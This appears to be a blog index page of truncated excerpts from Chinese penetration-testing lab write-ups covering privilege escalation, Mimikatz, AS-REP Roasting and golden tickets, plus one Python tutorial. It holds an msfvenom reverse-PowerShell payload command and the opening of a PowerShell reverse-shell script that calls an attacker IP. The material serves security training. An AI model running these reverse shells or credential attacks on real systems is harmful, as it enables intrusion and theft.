Potato strcmp密码绕过 不可写入目录绕过
简介point 5PotatoDifficulty Easyrated by community Intermediate 实验环境攻击者 Kali 192.168.45.201受害者 IP 192.168.161.101 Linux 1. 信息收集收集受害者服务详情nmap -sV -A 192.1...
Arctic Juicy Potato提权
拿到了反弹shell之后这种可以用Juciy Potato或者PrintSpoofer提权kali上制作木马msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.16.18 LPORT=3333 > systemreverse.batKali监听333...
Golden eye 1.1 part 2
我们现在已经登录到了管理员页面 用wappalyzer查看使用的是什么服务 LMS moodle 查询如何查看版本https://www.isharkfly.com/t/moodle/4486 Google查询 moodle 2.2.3 exploit发现可以使用 e...
Slort
简介point 20SlortDifficulty INTERMEDIATErated by community INTERMEDIATE 实验环境攻击者 Kali 192.168.45.231受害者 IP 192.168.166.53 Windows 1. 信息收集收集受害者服务详情21/tcp ope...
Mimikatz简单使用
1. Mimikatz介绍作者:Benjamin DelpyBeniamin Delpy最初创建 Mimikatz是为了向微软证明其身份验证协议容易受到攻击然而,这个工具在20之后仍然被广泛用于网络安全行业这个工具也是世界上最好的...
powershell反弹shell制作
Kali使用pwsh编译$Text = '$client = New-Object System.Net.Sockets.TCPClient('192.168.45.211',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.R...
对 Active Directory 身份验证执行攻击2 AS-REP Roasting
Kerberos 进行身份验证过程的第一步是发送 ASREQ。根据此请求,域控制器可以验证身份验证是否成功。如果是,域控制器将回复包含会话密钥和 TGT 的 AS-REP。此步骤通常也称为 Kerberos 预身份验...
Objective 8 黄金票据
任务从dollarcorp的DC拿到secrets使用krbtgt账户的secrets 制作一个黄金票据使用黄金票据(再一次)从一个机器拿到 doamin admin 权限 使用管理员权限运行终端C:\AD\Tools\ArgSplit.bat asktgtse...
Symfonos:3 shellshock新方法 python库注入
实验环境攻击者 Kali 192.168.192.128受害者 IP 192.168.192.183 Linux 1. 信息收集在/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 中的cgi-bin的后面加一个/ gobutser扫...
Python数据容器 字典
1. 字典的定义字典的定义,同样使用引,不过存储的元素是一个个的:键值对,如下语法:#定义字典字面量{key:value,key:value,......key:value}#定义字典变量my_dict = {key:value,key:value,......